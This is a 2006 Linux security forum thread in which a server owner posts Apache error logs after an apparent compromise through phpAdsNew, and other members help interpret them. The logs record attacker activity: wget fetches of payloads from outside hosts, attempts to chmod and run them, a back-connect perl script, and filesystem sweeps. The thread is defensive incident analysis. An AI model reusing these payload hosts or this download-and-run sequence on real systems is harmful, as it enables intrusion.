LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Old 07-07-2006, 04:05 PM   #1
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Rep: Reputation: 15
tracking source of hacker


I recently had a box hacked and I believe phpAdsNew was the entry point. Would anyone like to discuss how they determine this? My ad server was out of date, true, but the hack corrupted my SuSe server as well and I'm having to do a new install of OS, software etc.

I saw a bot, it appears [209.190.222.186], in the error log files searching for any and all scripts, but especially phpAdsNew, especially xmlrpc.php & adxmlrpc.php, and other ones like phpBB, phpMyAdmin etc.

I also have an odd line in my log files I don't understand, but I saw this the last time my server acted sluggish. Is this a DOS attack?

Code:
connect 194.109.153.2:6667 http:/1.0   pxyscand/2.1
 
Old 07-07-2006, 05:39 PM   #2
leonscape
Senior Member
 
Registered: Aug 2003
Location: UK
Distribution: Debian SID / KDE 3.5
Posts: 2,313

Rep: Reputation: 48
Doing a reverse DNS, the domain name came back as engine07.atwcorp.com. Looking at their website, they are a software security company.

Maybe the hosting was doing a scan for vulnerable software?

The other one in the log looks like the PXYS2 Proxy Scanner software at work, looking for an IRC server.
 
Old 07-07-2006, 07:22 PM   #3
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Original Poster
Rep: Reputation: 15
But I doubt the security company is actually doing the scanning; probably a funny joke by the scammer, throwing you off his tracks by using an oddly enough trusted IP?

I found something odd in my error_log too:

Code:
[Sun Jun 11 04:20:56 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Sun Jun 11 08:18:48 2006] [notice] child pid 23195 exit signal Segmentation fault (11)
[Sun Jun 11 08:38:24 2006] [notice] child pid 23784 exit signal Segmentation fault (11)
[Sun Jun 11 08:54:28 2006] [notice] child pid 24119 exit signal Segmentation fault (11)
[Sun Jun 11 09:43:26 2006] [notice] child pid 25384 exit signal Segmentation fault (11)
[Sun Jun 11 10:09:00 2006] [notice] child pid 26275 exit signal Segmentation fault (11)
[Sun Jun 11 10:18:12 2006] [notice] child pid 26490 exit signal Segmentation fault (11)
[Sun Jun 11 11:04:20 2006] [notice] child pid 27764 exit signal Segmentation fault (11)
[Sun Jun 11 11:15:34 2006] [notice] child pid 28419 exit signal Segmentation fault (11)
[Sun Jun 11 12:03:29 2006] [notice] child pid 29624 exit signal Segmentation fault (11)
[Sun Jun 11 12:13:09 2006] [notice] child pid 30018 exit signal Segmentation fault (11)
[Sun Jun 11 18:18:37 2006] [notice] child pid 8381 exit signal Segmentation fault (11)
[Sun Jun 11 23:45:43 2006] [notice] child pid 22540 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb63a4014 ***
[Mon Jun 12 20:43:44 2006] [notice] child pid 407 exit signal Segmentation fault (11)
[Tue Jun 13 19:07:34 2006] [notice] child pid 18204 exit signal Segmentation fault (11)
Premature end of JPEG file
Premature end of JPEG file
*** glibc detected *** double free or corruption: 0xb754c014 ***
--18:01:14--  http://www.dulci.go.ro/bash
           => `bash'
Resolving www.dulci.go.ro... 81.196.20.134
Connecting to www.dulci.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,123 (11K) [text/plain]

    0K ..........                                            100%   50.49 KB/s

18:01:15 (50.49 KB/s) - `bash' saved [11123/11123]

sh: chmdo: command not found
sh: ./bash: Permission denied
sh: ./bash: Permission denied
sh: locate: command not found
--18:03:11--  http://www.chinez.xhost.ro/super.tar.gz
           => `super.tar.gz'
Resolving www.chinez.xhost.ro... 64.111.196.20
Connecting to www.chinez.xhost.ro|64.111.196.20|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: http://chinez.xhost.ro/super.tar.gz [following]
--18:03:11--  http://chinez.xhost.ro/super.tar.gz
           => `super.tar.gz'
Resolving chinez.xhost.ro... 64.111.196.20
Connecting to chinez.xhost.ro|64.111.196.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 254,365 (248K) [application/x-gzip]


    0K .......... .......... .......... .......... .......... 20%   32.63 KB/s
   50K .......... .......... .......... .......... .......... 40%   30.48 KB/s
  100K .......... .......... .......... .......... .......... 60%   29.76 KB/s
  150K .......... .......... .......... .......... .......... 80%   29.58 KB/s
  200K .......... .......... .......... .......... ........  100%   30.43 KB/s

18:03:20 (30.54 KB/s) - `super.tar.gz' saved [254365/254365]

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
sh: locate: command not found
*** glibc detected *** double free or corruption: 0x084d4bcc ***
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Thu Jun 15 14:46:57 2006] [notice] child pid 16922 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb633e014 ***
 
Old 07-07-2006, 10:49 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
The box definitely appears hacked. Could you post all of the relevant Apache logs?

The gd errors relating to corrupt jpeg images look like this unpatched vuln, though I'm unsure of how you'd exploit a webserver remotely with that.
 
Old 07-07-2006, 11:35 PM   #5
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Original Poster
Rep: Reputation: 15
error_log (continued)
Code:
....
[Thu Jun 15 14:46:57 2006] [notice] child pid 16922 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb633e014 ***
*** glibc detected *** double free or corruption: 0x084637e4 ***
[Sat Jun 17 23:25:39 2006] [notice] child pid 26970 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0x08572f24 ***
*** glibc detected *** double free or corruption: 0x084d43d4 ***
*** glibc detected *** double free or corruption: 0xb6307014 ***
*** glibc detected *** double free or corruption: 0xb63a5014 ***
[Sun Jun 18 17:27:59 2006] [notice] child pid 22168 exit signal Segmentation fault (11)
[Sun Jun 18 22:51:23 2006] [notice] child pid 3618 exit signal Segmentation fault (11)
[Mon Jun 19 03:02:36 2006] [notice] child pid 11077 exit signal Segmentation fault (11)
[Mon Jun 19 04:50:35 2006] [notice] child pid 13470 exit signal Segmentation fault (11)
--06:29:15--  http://www.geocities.com/adasadaa/x
           => `x'
Resolving www.geocities.com... 66.218.77.68
Connecting to www.geocities.com|66.218.77.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 656 [application/octet-stream]

    0K                                                       100%   36.80 MB/s

06:29:15 (36.80 MB/s) - `x' saved [656/656]

*** glibc detected *** double free or corruption: 0xb63a4014 ***
*** glibc detected *** double free or corruption: 0xb6378014 ***
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Mon Jun 19 16:04:30 2006] [notice] child pid 19137 exit signal Segmentation fault (11)
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Mon Jun 19 16:25:32 2006] [notice] child pid 20450 exit signal Segmentation fault (11)
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Mon Jun 19 19:33:21 2006] [notice] child pid 28828 exit signal Segmentation fault (11)
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Tue Jun 20 19:18:30 2006] [notice] child pid 31654 exit signal Segmentation fault (11)
[Tue Jun 20 22:18:18 2006] [notice] child pid 7983 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb630a014 ***
[Wed Jun 21 08:24:57 2006] [notice] child pid 26447 exit signal Segmentation fault (11)
[Wed Jun 21 14:26:32 2006] [notice] child pid 14253 exit signal Segmentation fault (11)
[Thu Jun 22 01:47:41 2006] [notice] child pid 11249 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0x084636fc ***
*** glibc detected *** double free or corruption: 0xb6377014 ***
[Thu Jun 22 13:26:34 2006] [notice] child pid 32232 exit signal Segmentation fault (11)
[Thu Jun 22 15:09:27 2006] [notice] child pid 4887 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0x0845e08c ***
*** glibc detected *** double free or corruption: 0xb62f5014 ***
[Fri Jun 23 10:16:05 2006] [notice] child pid 11797 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb63a5014 ***
[Fri Jun 23 19:11:37 2006] [notice] child pid 4416 exit signal Segmentation fault (11)
[Sat Jun 24 05:39:59 2006] [notice] child pid 22953 exit signal Segmentation fault (11)
[Sat Jun 24 06:41:53 2006] [notice] child pid 23945 exit signal Segmentation fault (11)
[Sat Jun 24 10:33:56 2006] [notice] child pid 29906 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb62f1014 ***
*** glibc detected *** double free or corruption: 0x08538c2c ***
[Sat Jun 24 16:20:33 2006] [notice] child pid 10163 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb62cc014 ***
[Sun Jun 25 08:54:07 2006] [notice] child pid 5515 exit signal Segmentation fault (11)
[Sun Jun 25 10:09:36 2006] [notice] child pid 7489 exit signal Segmentation fault (11)
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Sun Jun 25 23:28:49 2006] [notice] child pid 3936 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0x084805b4 ***
[Mon Jun 26 02:09:43 2006] [notice] child pid 9980 exit signal Segmentation fault (11)
[Mon Jun 26 11:09:40 2006] [notice] child pid 23837 exit signal Segmentation fault (11)
[Mon Jun 26 14:06:23 2006] [notice] child pid 32222 exit signal Segmentation fault (11)
[Mon Jun 26 17:11:13 2006] [notice] child pid 8716 exit signal Segmentation fault (11)
[Mon Jun 26 17:50:54 2006] [notice] child pid 10437 exit signal Segmentation fault (11)
find: /etc/ppp: Permission denied
find: /etc/ssl/private: Permission denied
find: /etc/cups/ssl: Permission denied
find: /etc/cups/certs: Permission denied
find: /etc/news: Permission denied
find: /etc/uucp: Permission denied
find: /etc/sysconfig/network/providers: Permission denied
find: /etc/webmin: Permission denied
find: /etc/autoinstall: Permission denied
find: /etc/apache2/ssl.key: Permission denied
find: /srv/ftp: Permission denied
find: /tmp/mcop-msusol: Permission denied
find: /tmp/3Ddiag.Tr7477: Permission denied
find: /tmp/3Ddiag.YS6564: Permission denied
find: /tmp/YaST2-03816-Gkzrfl: Permission denied
find: /tmp/YaST2-18962-nsuZQ7: Permission denied
find: /tmp/YaST2-05876-URBRa3: Permission denied
find: /tmp/3Ddiag.a16732: Permission denied
find: /tmp/mc-root: Permission denied
find: /tmp/YaST2.tdir: Permission denied
find: /tmp/3Ddiag.aV7120: Permission denied
find: /tmp/YaST2-10473-xEK0uq: Permission denied
find: /tmp/YaST2-10615-cBzCag: Permission denied
find: /tmp/suse_desktop_ErRc1U: Permission denied
find: /tmp/3Ddiag.fM9259: Permission denied
find: /tmp/YaST2-10897-PgjKmj: Permission denied
find: /tmp/YaST2-06848-Q744JJ: Permission denied
find: /tmp/YaST2-10517-jagiVP: Permission denied
find: /tmp/ksocket-root: Permission denied
find: /tmp/gconfd-root: Permission denied
find: /tmp/YaST2-17695-6BxE42: Permission denied
find: /tmp/YaST2-05266-m8nydR: Permission denied
find: /tmp/kde-root: Permission denied
find: /tmp/3Ddiag.nk6146: Permission denied
find: /tmp/3Ddiag.rK6073: Permission denied
find: /tmp/YaST2-06687-O34bdy: Permission denied
find: /tmp/gpg-dQtAEU: Permission denied
find: /tmp/3Ddiag.ou6715: Permission denied
find: /tmp/3Ddiag.rf6824: Permission denied
find: /tmp/3Ddiag.rs6255: Permission denied
find: /tmp/kde-msusol: Permission denied
find: /tmp/orbit-root: Permission denied
find: /tmp/orbit-msusol: Permission denied
find: /tmp/3Ddiag.yQ7863: Permission denied
find: /tmp/3Ddiag.wi7586: Permission denied
find: /tmp/YaST2-26946-Ndu3hJ: Permission denied
find: /tmp/ksocket-msusol: Permission denied
find: /tmp/YaST2-26873-kpFiIS: Permission denied
find: /tmp/gpg-uMdnPM: Permission denied
find: /tmp/YaST2-13833-RkMX69: Permission denied
find: /tmp/gconfd-msusol: Permission denied
find: /tmp/YaST2-10545-isvqm5: Permission denied
find: /tmp/sysconfig-update: Permission denied
find: /tmp/YaST2-17723-URzUyw: Permission denied
find: /tmp/YaST2-09285-kOS7gq: Permission denied
find: /tmp/mcop-root: Permission denied
find: /tmp/3Ddiag.N16841: Permission denied
find: /tmp/3Ddiag.Ji6182: Permission denied
find: /var/adm/backup: Permission denied
find: /var/adm/autoinstall: Permission denied
find: /var/lib/nfs/sm: Permission denied
find: /var/lib/nfs/sm.bak: Permission denied
find: /var/lib/xdm/authdir: Permission denied
find: /var/lib/acpi: Permission denied
find: /var/lib/pam_devperm: Permission denied
find: /var/lib/mysql/test: Permission denied
find: /var/lib/mysql/cacti: Permission denied
find: /var/lib/mysql/ultimateeventing_com_-_phpbb: Permission denied
find: /var/lib/mysql/mysql: Permission denied
find: /var/lib/mysql/ultimatecreativemedia_com_-_phpcollab: Permission denied
find: /var/lib/mysql/ultimatedressage_com_-_class: Permission denied
find: /var/lib/mysql/ultimatecreativemedia_com_-_crm: Permission denied
find: /var/lib/mysql/ultimatecreativemedia_com_-_sda: Permission denied
find: /var/lib/mysql/ultimatedressage_com_-_phpbb: Permission denied
find: /var/lib/samba/profiles: Permission denied
find: /var/lib/smpppd: Permission denied
find: /var/log/news: Permission denied
find: /var/log/YaST2: Permission denied
find: /var/log/smpppd: Permission denied
find: /var/log/apache2: Permission denied
find: /var/run/sudo: Permission denied
find: /var/run/agentx: Permission denied
find: /var/run/smpppd: Permission denied
find: /var/run/xdmctl/dmctl: Permission denied
find: /var/run/xdmctl/dmctl-:0: Permission denied
find: /var/run/pure-ftpd: Permission denied
find: /var/tmp/kdecache-msusol: Permission denied
find: /var/tmp/kdecache-root: Permission denied
find: /var/streaming: Permission denied
find: /var/spool/cron: Permission denied
find: /var/spool/cups: Permission denied
find: /var/spool/clientmqueue: Permission denied
find: /var/spool/atjobs: Permission denied
find: /var/spool/atspool: Permission denied
find: /var/spool/postfix/hold: Permission denied
find: /var/spool/postfix/corrupt: Permission denied
find: /var/spool/postfix/defer: Permission denied
find: /var/spool/postfix/flush: Permission denied
find: /var/spool/postfix/saved: Permission denied
find: /var/spool/postfix/trace: Permission denied
find: /var/spool/postfix/maildrop: Permission denied
find: /var/spool/postfix/active: Permission denied
find: /var/spool/postfix/bounce: Permission denied
find: /var/spool/postfix/deferred: Permission denied
find: /var/spool/postfix/public: Permission denied
find: /var/spool/postfix/incoming: Permission denied
find: /var/spool/postfix/private: Permission denied
find: /var/webmin: Permission denied
find: /usr/lib/man-db: Permission denied
find: /usr/share/YaST2/data/support: Permission denied
find: /home/msusol/.kde: Permission denied
find: /home/msusol/Mail: Permission denied
find: /home/msusol/Desktop: Permission denied
find: /proc/tty/driver: Permission denied
find: /proc/1/task/1/fd: Permission denied
find: /proc/2/task/2/fd: Permission denied
find: /proc/3/task/3/fd: Permission denied
find: /proc/4/task/4/fd: Permission denied
find: /proc/5/task/5/fd: Permission denied
find: /proc/6/task/6/fd: Permission denied
find: /proc/7/task/7/fd: Permission denied
find: /proc/8/task/8/fd: Permission denied
find: /proc/9/task/9/fd: Permission denied
find: /proc/10/task/10/fd: Permission denied
find: /proc/11/task/11/fd: Permission denied
find: /proc/12/task/12/fd: Permission denied
find: /proc/13/task/13/fd: Permission denied
find: /proc/14/task/14/fd: Permission denied
find: /proc/15/task/15/fd: Permission denied
find: /proc/16/task/16/fd: Permission denied
find: /proc/17/task/17/fd: Permission denied
find: /proc/18/task/18/fd: Permission denied
find: /proc/19/task/19/fd: Permission denied
find: /proc/43/task/43/fd: Permission denied
find: /proc/44/task/44/fd: Permission denied
find: /proc/45/task/45/fd: Permission denied
find: /proc/46/task/46/fd: Permission denied
find: /proc/56/task/56/fd: Permission denied
find: /proc/60/task/60/fd: Permission denied
find: /proc/59/task/59/fd: Permission denied
find: /proc/61/task/61/fd: Permission denied
find: /proc/62/task/62/fd: Permission denied
find: /proc/63/task/63/fd: Permission denied
find: /proc/646/task/646/fd: Permission denied
find: /proc/1412/task/1412/fd: Permission denied
find: /proc/1523/task/1523/fd: Permission denied
find: /proc/1524/task/1524/fd: Permission denied
find: /proc/1525/task/1525/fd: Permission denied
find: /proc/1526/task/1526/fd: Permission denied
find: /proc/2189/task/2189/fd: Permission denied
find: /proc/2243/task/2243/fd: Permission denied
find: /proc/2612/task/2612/fd: Permission denied
find: /proc/3317/task/3317/fd: Permission denied
find: /proc/3331/task/3331/fd: Permission denied
find: /proc/3332/task/3332/fd: Permission denied
find: /proc/3475/task/3475/fd: Permission denied
find: /proc/3728/task/3728/fd: Permission denied
find: /proc/3731/task/3731/fd: Permission denied
find: /proc/3774/task/3774/fd: Permission denied
find: /proc/3780/task/3780/fd: Permission denied
find: /proc/3895/task/3895/fd: Permission denied
find: /proc/3906/task/3906/fd: Permission denied
find: /proc/4010/task/4010/fd: Permission denied
find: /proc/4011/task/4011/fd: Permission denied
find: /proc/4061/task/4061/fd: Permission denied
find: /proc/4062/task/4062/fd: Permission denied
find: /proc/4296/task/4296/fd: Permission denied
find: /proc/4387/task/4387/fd: Permission denied
find: /proc/5014/task/5014/fd: Permission denied
find: /proc/5030/task/5030/fd: Permission denied
find: /proc/5060/task/5060/fd: Permission denied
find: /proc/5069/task/5069/fd: Permission denied
find: /proc/5087/task/5087/fd: Permission denied
find: /proc/5105/task/5105/fd: Permission denied
find: /proc/5171/task/5171/fd: Permission denied
find: /proc/5218/task/5218/fd: Permission denied
find: /proc/5221/task/5221/fd: Permission denied
find: /proc/5233/task/5233/fd: Permission denied
find: /proc/5992/task/5992/fd: Permission denied
find: /proc/5995/task/5995/fd: Permission denied
find: /proc/5997/task/5997/fd: Permission denied
find: /proc/5998/task/5998/fd: Permission denied
find: /proc/5999/task/5999/fd: Permission denied
find: /proc/6000/task/6000/fd: Permission denied
find: /proc/6001/task/6001/fd: Permission denied
find: /proc/6002/task/6002/fd: Permission denied
find: /proc/6005/task/6005/fd: Permission denied
find: /proc/6009/task/6009/fd: Permission denied
find: /proc/6020/task/6020/fd: Permission denied
find: /proc/6043/task/6043/fd: Permission denied
find: /proc/6066/task/6066/fd: Permission denied
find: /proc/6068/task/6068/fd: Permission denied
find: /proc/6069/task/6069/fd: Permission denied
find: /proc/6073/task/6073/fd: Permission denied
find: /proc/6074/task/6074/fd: Permission denied
find: /proc/6078/task/6078/fd: Permission denied
find: /proc/6079/task/6079/fd: Permission denied
find: /proc/6097/task/6097/fd: Permission denied
find: /proc/6099/task/6099/fd: Permission denied
find: /proc/6101/task/6101/fd: Permission denied
find: /proc/6104/task/6104/fd: Permission denied
find: /proc/6105/task/6105/fd: Permission denied
find: /proc/6109/task/6109/fd: Permission denied
find: /proc/6114/task/6114/fd: Permission denied
find: /proc/6297/task/6297/fd: Permission denied
find: /proc/6298/task/6298/fd: Permission denied
find: /proc/21271/task/21271/fd: Permission denied
find: /proc/20209/task/20209/fd: Permission denied
find: /proc/29825/task/29825/fd: Permission denied
find: /proc/30955/task/30955/fd: Permission denied
find: /proc/31130/task/31130/fd: Permission denied
find: /proc/32367/task/32367/fd: Permission denied
find: /proc/3069/task/3069/fd: Permission denied
find: /proc/30494/task/30494/fd: Permission denied
find: /proc/8739/task/8739/fd: Permission denied
find: /proc/22723/task/22723/fd: Permission denied
find: /proc/26048/task/26048/fd: Permission denied
find: /proc/32504/task/32504/fd: Permission denied
find: /proc/31700/task/31700/fd: Permission denied
find: /proc/13389/task/13389/fd: Permission denied
find: /proc/6977/task/6977/fd: Permission denied
find: /proc/916/task/916/fd: Permission denied
find: /proc/12460/task/12460/fd: Permission denied
find: /proc/32481/task/32481/fd: Permission denied
find: /proc/12194/task/12194/fd: Permission denied
find: /proc/30594/task/30594/fd: Permission denied
find: /proc/15750/task/15750/fd: Permission denied
find: /proc/16762/task/16762/fd: Permission denied
find: /proc/17215/task/17215/fd: Permission denied
find: /proc/17299/task/17299/fd: Permission denied
find: /proc/17407/task/17407/fd: Permission denied
find: /proc/17463/task/17463/fd: Permission denied
find: /proc/17489/task/17489/fd: Permission denied
find: /proc/17521/task/17521/fd: Permission denied
find: /proc/17663/task/17663/fd: Permission denied
find: /proc/17664/task/17664/fd: Permission denied
find: /proc/17675/task/17675/fd: Permission denied
find: /proc/17680/task/17680/fd: Permission denied
find: /proc/17695/task/17695/fd: Permission denied
find: /proc/17699/task/17699/fd: Permission denied
find: /proc/17702/task/17702/fd: Permission denied
find: /proc/17705/task/17705/fd: Permission denied
find: /proc/17709/task/17709/fd: Permission denied
find: /proc/17713/task/17713/fd: Permission denied
find: /proc/17716/task/17716/fd: Permission denied
find: /proc/17742/task/17742/fd: Permission denied
find: /proc/17744/task/17744/fd: Permission denied
find: /proc/17747/task/17747/fd: Permission denied
find: /proc/17751/task/17751/fd: Permission denied
find: /proc/17752/task/17752/fd: Permission denied
find: /proc/17759/task/17759/fd/19: No such file or directory
find: /proc/17762/task/17762/fd: Permission denied
find: /proc/17763/task/17763/fd: Permission denied
find: /proc/17768/task/17768/fd: Permission denied
find: /proc/17771/task/17771/fd: Permission denied
find: /proc/17772/task/17772/fd: Permission denied
find: /proc/17773/task/17773/fd: Permission denied
find: /proc/17779/task/17779/fd: Permission denied
find: /proc/17780/task/17780/fd: Permission denied
find: /proc/17782/task/17782/fd: Permission denied
find: /proc/17792/task/17792/fd: Permission denied
find: /proc/17793/task/17793/fd: Permission denied
find: /proc/17797/task/17797/fd: Permission denied
find: /proc/17798/task/17798/fd: Permission denied
find: /proc/17803/task/17803/fd: Permission denied
find: /proc/17804/task/17804/fd: Permission denied
find: /proc/17805/task/17805/fd: Permission denied
find: /proc/17806/task/17806/fd: Permission denied
find: /proc/17807/task/17807/fd: Permission denied
find: /proc/17808/task/17808/fd: Permission denied
find: /proc/17809/task/17809/fd: Permission denied
find: /proc/17810/task/17810/fd: Permission denied
find: /proc/17811/task/17811/fd: Permission denied
find: /proc/17812/task/17812/fd: Permission denied
find: /proc/17813/task/17813/fd: Permission denied
find: /proc/17814/task/17814/fd: Permission denied
find: /proc/17815/task/17815/fd: Permission denied
find: /proc/17816/task/17816/fd: Permission denied
find: /proc/17817/task/17817/fd: Permission denied
find: /proc/17818/task/17818/fd: Permission denied
find: /proc/17819/task/17819/fd: Permission denied
find: /proc/17820/task/17820/fd: Permission denied
find: /proc/17821/task/17821/fd: Permission denied
find: /root: Permission denied
find: /media/cdrom: No medium found
find: /media/floppy: No medium found
find: /backups/hotbackup/ultimatedressage_com_-_class_old: Permission denied
find: /backups/hotbackup/ultimatedressage_com_-_phpbb_old: Permission denied
find: /backups/hotbackup/cacti_old: Permission denied
find: /backups/hotbackup/ultimatecreativemedia_com_-_crm_old: Permission denied
find: /backups/hotbackup/ultimatecreativemedia_com_-_sda_old: Permission denied
find: /backups/hotbackup/ultimatecreativemedia_com_-_phpcollab_old: Permission denied
find: /backups/hotbackup/mysql_old: Permission denied
find: /backups/hotbackup/ultimateeventing_com_-_phpbb_old: Permission denied
Unable to Connect
mv: cannot move `adxmlrpc.php' to `a.php': Permission denied
[Wed Jun 28 18:23:02 2006] [notice] child pid 30105 exit signal Segmentation fault (11)
[Wed Jun 28 20:00:44 2006] [notice] child pid 1583 exit signal Segmentation fault (11)
[Thu Jun 29 02:54:40 2006] [notice] child pid 16979 exit signal Segmentation fault (11)
[Thu Jun 29 17:26:26 2006] [notice] child pid 23048 exit signal Segmentation fault (11)
[Thu Jun 29 23:05:26 2006] [notice] child pid 3458 exit signal Segmentation fault (11)
dig: '.virginiasporthorses.com' is not a legal name (empty label)
ping: unknown host .virginiasporthorses.com
.virginiasporthorses.com: Name or service not known
[Fri Jun 30 04:37:44 2006] [notice] child pid 12665 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb6373014 ***
[Sat Jul 01 02:32:55 2006] [notice] child pid 30312 exit signal Segmentation fault (11)
[Sat Jul 01 02:47:54 2006] [notice] child pid 30757 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb62c5014 ***
*** glibc detected *** double free or corruption: 0x084b04dc ***
[Sat Jul 01 13:00:02 2006] [notice] SIGHUP received.  Attempting to restart
[Sat Jul 01 13:00:05 2006] [warn] NameVirtualHost *:0 has no VirtualHosts
[Sat Jul 01 13:00:07 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
sh: locate: command not found
sh: line 0: cd: /tmp: No such file or directory
Can't open perl script "dc.txt": No such file or directory.
Use -S to search $PATH for it.
[Sat Jul 01 17:40:36 2006] [notice] child pid 5606 exit signal Segmentation fault (11)
[Sat Jul 01 21:00:20 2006] [notice] child pid 12440 exit signal Segmentation fault (11)
sh: line 0: cd: /tmp: No such file or directory
--21:38:52--  http://www.dulci.go.ro/bash
           => `bash'
Resolving www.dulci.go.ro... 81.196.20.134
Connecting to www.dulci.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,123 (11K) [text/plain]
bash: Permission denied

Cannot write to `bash' (Permission denied).
chmod: cannot access `bash': No such file or directory
sh: ./bash: No such file or directory
*** glibc detected *** double free or corruption: 0xb62ed014 ***
[Mon Jul 03 00:23:20 2006] [notice] child pid 25522 exit signal Segmentation fault (11)
[Sun Jul 02 23:09:44 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Sun Jul 02 23:09:44 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Sun Jul 02 23:09:46 2006] [warn] pid file /var/run/httpd2.pid overwritten -- Unclean shutdown of previous Apache run?
[Sun Jul 02 23:09:46 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Sun Jul 02 23:24:06 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Sun Jul 02 23:24:06 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Sun Jul 02 23:24:09 2006] [warn] pid file /var/run/httpd2.pid overwritten -- Unclean shutdown of previous Apache run?
[Sun Jul 02 23:24:09 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Mon Jul 03 01:17:01 2006] [notice] caught SIGTERM, shutting down
[Wed Jul 05 21:22:11 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Jul 05 21:22:11 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Jul 05 21:22:13 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Wed Jul 05 21:30:35 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Jul 05 21:30:35 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Jul 05 21:30:37 2006] [warn] pid file /var/run/httpd2.pid overwritten -- Unclean shutdown of previous Apache run?
[Wed Jul 05 21:30:37 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Wed Jul 05 22:32:32 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Jul 05 22:32:32 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Jul 05 22:32:35 2006] [warn] pid file /var/run/httpd2.pid overwritten -- Unclean shutdown of previous Apache run?
[Wed Jul 05 22:32:35 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Wed Jul 05 23:00:15 2006] [notice] caught SIGTERM, shutting down
[Wed Jul 05 23:03:51 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Jul 05 23:03:51 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Jul 05 23:03:53 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Wed Jul 05 23:43:29 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Jul 05 23:43:29 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Jul 05 23:43:33 2006] [warn] pid file /var/run/httpd2.pid overwritten -- Unclean shutdown of previous Apache run?
[Wed Jul 05 23:43:33 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
 
Old 07-07-2006, 11:48 PM   #6
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Original Poster
Rep: Reputation: 15
We know something really happened on Jul 1 16:51 because a new user was added to the server, verified by checking the last date stamp on /etc/passwd.

other oddities:
Code:
[Sat Jul 01 13:17:27 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/a1b2c3d4e5f6g7h8i9
[Sat Jul 01 13:17:27 2006] [error] [client 66.221.68.185] script '/srv/www/vhosts/susebox/html/adxmlrpc.php' not found or unable to stat
[Sat Jul 01 13:17:27 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/adserver
[Sat Jul 01 13:17:27 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/phpAdsNew
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/phpadsnew
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/phpads
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/Ads
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/ads
